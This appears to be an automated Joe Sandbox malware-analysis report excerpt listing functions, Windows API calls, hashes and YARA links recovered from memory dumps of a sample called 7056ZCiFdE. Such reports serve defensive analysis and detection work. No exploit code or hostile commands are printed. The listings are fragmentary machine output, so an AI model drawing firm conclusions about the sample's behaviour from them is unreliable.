                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    • Opcode ID: a3629c909564942c7c8b75870f835829e090811fdfb2092ae3fc6556c3fc90d6
                                    • Instruction ID: 5320b177317d73317a35caa172307b3f974c134491247eabb84f9dffa1c2d1af
                                    • Opcode Fuzzy Hash: a3629c909564942c7c8b75870f835829e090811fdfb2092ae3fc6556c3fc90d6
                                    • Instruction Fuzzy Hash: EC516531A1050E96EF14EF64C944BEF7379FF98300F4045A9B609EB180EB79AB49CB65
                                    Function 008A0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: 917dd54d1a6275c139c61eb7335d39d8bf878020d41e408aa861bbe2d8991666
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: B431D570A001099BE718DF58C484969F7A6FB5A320B6487A5E80ACFB51D731EED1DFC0
                                    Function 008BFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 9d61d9d0c138318badf97d2c89d98184d5ec50aed61f100ae4535fef6969e352
                                    • Instruction ID: 85ef43183849a6ce282b3d58c53f93d9c84848b6103f1fc2bef2cc01e8355677
                                    • Opcode Fuzzy Hash: 9d61d9d0c138318badf97d2c89d98184d5ec50aed61f100ae4535fef6969e352
                                    • Instruction Fuzzy Hash: 8841D4745043419FEB24DF18C454B1ABBE1FF49318F0988ACE9998B762C736E845CF52
                                    Function 00887B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 1a92a8d2d274328c4bdae9058aedb4b7ce38b925b86feb4cf6e4d7e8b767809e
                                    • Instruction ID: 1cb682e5a969953c30681da2064e94378dfe3d807b82c575017ea5d8841df713
                                    • Opcode Fuzzy Hash: 1a92a8d2d274328c4bdae9058aedb4b7ce38b925b86feb4cf6e4d7e8b767809e
                                    • Instruction Fuzzy Hash: 4521F772A24A09EBDB249F15E8517EA7FB4FF14360F218529E485C52A0EB70D1D0DB45
                                    Function 00884DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00884BEF
                                      • Part of subcall function 008A525B: __wfsopen.LIBCMT ref: 008A5266
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E0F
                                      • Part of subcall function 00884B6A: FreeLibrary.KERNEL32(00000000), ref: 00884BA4
                                      • Part of subcall function 00884C70: _memmove.LIBCMT ref: 00884CBA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load__wfsopen_memmove
                                    • String ID:
                                    • API String ID: 1396898556-0
                                    • Opcode ID: a7ff77bcbfaed77811547a865bb4c308c56aa463a34db894f0b3e21355a2b778
                                    • Instruction ID: 8c2e27a7c33050b24e2e54b11e7a963210a229f8985ebf37cf8d0be224712049
                                    • Opcode Fuzzy Hash: a7ff77bcbfaed77811547a865bb4c308c56aa463a34db894f0b3e21355a2b778
                                    • Instruction Fuzzy Hash: 3711E733640306ABCF20FFB8C812FAE77A9FF44720F108829F541E7181EA719A009B52
                                    Function 008BFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 8239f18fc50af0b1accaf65d671bc33402258e281a271469b1aebe96ff4b15e4
                                    • Instruction ID: 0d14451919be46a4290438b674279b5a42db6262cfa93b15c59bcfddf2c23ebf
                                    • Opcode Fuzzy Hash: 8239f18fc50af0b1accaf65d671bc33402258e281a271469b1aebe96ff4b15e4
                                    • Instruction Fuzzy Hash: 0A21F374508341DFDB24EF64C444A2ABBE1FF89314F058968F98A97762D731E815CF92
                                    Function 008A072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 29103d501496fe8fa86c701e03e5f947c9735dafba124bfda064f08d2be8de5a
                                    • Instruction ID: 031303c402fd9e76263444b0d9b0b45832b0d0da06afc3fab23f9e3589fbd738
                                    • Opcode Fuzzy Hash: 29103d501496fe8fa86c701e03e5f947c9735dafba124bfda064f08d2be8de5a
                                    • Instruction Fuzzy Hash: 34016D775040489FC711EB64EC41EE4BBACEFCA360B0401FAEC89CB961E6209A599B91
                                    Function 008A4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock_file.LIBCMT ref: 008A48A6
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: dc6d2ab047b0099602d6d159a1825de166305619240a7184a035586e4030379d
                                    • Instruction ID: df85e9a7815ca45f302fdf2a11554c28c3d59f66cc96ce66cf7eb28872ec63fd
                                    • Opcode Fuzzy Hash: dc6d2ab047b0099602d6d159a1825de166305619240a7184a035586e4030379d
                                    • Instruction Fuzzy Hash: 1DF0A431900649EBFF11AF689C0579E3AA0FF42325F155424B414D7992DBFC8951DB62
                                    Function 00884E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: a837dd9e64a277a05643c377525c5cda11b6b3182e718a4f0258b8ebf12390b9
                                    • Instruction ID: 2e3e383939a57f8bcf57c3c0d8789e165c4a76113e6c96331111b5205da68a70
                                    • Opcode Fuzzy Hash: a837dd9e64a277a05643c377525c5cda11b6b3182e718a4f0258b8ebf12390b9
                                    • Instruction Fuzzy Hash: 7BF03072505712CFCB34AF64D494812B7E1FF55339320993EE1D6C2610C732A840DF40
                                    Function 008A0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongNamePath_memmove
                                    • String ID:
                                    • API String ID: 2514874351-0
                                    • Opcode ID: 7869ef6f29254bf57877fe9214d4d222949e1f708509dfc713f7adefca324349
                                    • Instruction ID: 34766cd5d2ba7fa6c61e921843d973f2ca4b8555fcb4667ee72a19a5a6c7aa20
                                    • Opcode Fuzzy Hash: 7869ef6f29254bf57877fe9214d4d222949e1f708509dfc713f7adefca324349
                                    • Instruction Fuzzy Hash: A3E086369041285BC720A65C9C05FEA77ADEB887A0F0441B5FC08D7205D9609D808691
                                    Function 008E8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                    • Instruction ID: 7ecc33a1b10509faf0ca27ec67541a2252f87de3361c460be49f4395444d65f4
                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                    • Instruction Fuzzy Hash: DAE092B0504B409FD7388A24D801BA373E1FB06304F00081DF6AAC3241EB6278418B59
                                    Function 015F91E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 015F91EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 183562a44d809326b6104d1bbade0ee1806df1d0e688b174f5e09b38e88f6e8e
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: EDE08C71A0560CEBDB60CAAC8808BAD77A8EB09324F004A6CFA2ACB290D5308A409614
                                    Function 015F91B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 015F91BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: c7dba4a029a80f19b1b55c33b857e7013c0d40fc08d835de87f79e7bd395ae99
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: 34D0A73090560CEBCB20DFB89C08EDE73A8E704324F00476DFE15C7280D6319940D790
                                    Function 008A525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wfsopen
                                    • String ID:
                                    • API String ID: 197181222-0
                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction ID: fbad2a94a82745f1a51a3a83aa2d07d8cd6c3153a1e5c4eae0f2d4825a4baa3c
                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                    • Instruction Fuzzy Hash: A2B0927644020C77DE012A86EC02B893B1AAB42B64F408020FB0C18562A673A6A49A8A
                                    Function 015FABA0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 015FABB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 843c2b59f00dce13e5e96acc73dd94f38a5c80d8fcab2dd521b1e33dd8bb8c24
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: 41E0E67494010EDFDB00EFB4D54DA9E7FB4FF04301F100565FD05D2281D6309D508A62

                                    Non-executed Functions

                                    Function 0090CABC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 632windowkeyboardnativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0090CB37
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CB95
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090CBD6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CC00
                                    • SendMessageW.USER32 ref: 0090CC29
                                    • _wcsncpy.LIBCMT ref: 0090CC95
                                    • GetKeyState.USER32(00000011), ref: 0090CCB6
                                    • GetKeyState.USER32(00000009), ref: 0090CCC3
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CCD9
                                    • GetKeyState.USER32(00000010), ref: 0090CCE3
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CD0C
                                    • SendMessageW.USER32 ref: 0090CD33
                                    • SendMessageW.USER32(?,00001030,?,0090B348), ref: 0090CE37
                                    • SetCapture.USER32(?), ref: 0090CE69
                                    • ClientToScreen.USER32(?,?), ref: 0090CECE
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0090CEF5
                                    • ReleaseCapture.USER32 ref: 0090CF00
                                    • GetCursorPos.USER32(?), ref: 0090CF3A
                                    • ScreenToClient.USER32(?,?), ref: 0090CF47
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090CFA3
                                    • SendMessageW.USER32 ref: 0090CFD1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D00E
                                    • SendMessageW.USER32 ref: 0090D03D
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D05E
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D06D
                                    • GetCursorPos.USER32(?), ref: 0090D08D
                                    • ScreenToClient.USER32(?,?), ref: 0090D09A
                                    • GetParent.USER32(?), ref: 0090D0BA
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D123
                                    • SendMessageW.USER32 ref: 0090D154
                                    • ClientToScreen.USER32(?,?), ref: 0090D1B2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D1E2
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D20C
                                    • SendMessageW.USER32 ref: 0090D22F
                                    • ClientToScreen.USER32(?,?), ref: 0090D281
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D2B5
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090D351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 302779176-4164748364
                                    • Opcode ID: 072ab25f4501b08fa6ed7e21ff227a4f311e217776adf9f78644b7754ab68b38
                                    • Instruction ID: 711fb37b491eb9deba0adac05fb5ad82b5189ea6da3158ad33e01729473ed232
                                    • Opcode Fuzzy Hash: 072ab25f4501b08fa6ed7e21ff227a4f311e217776adf9f78644b7754ab68b38
                                    • Instruction Fuzzy Hash: BE429AB4208241AFDB24DF68D844EAABBE9FF49314F140A29F695C72F1C731D941EB52
                                    Function 00896F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
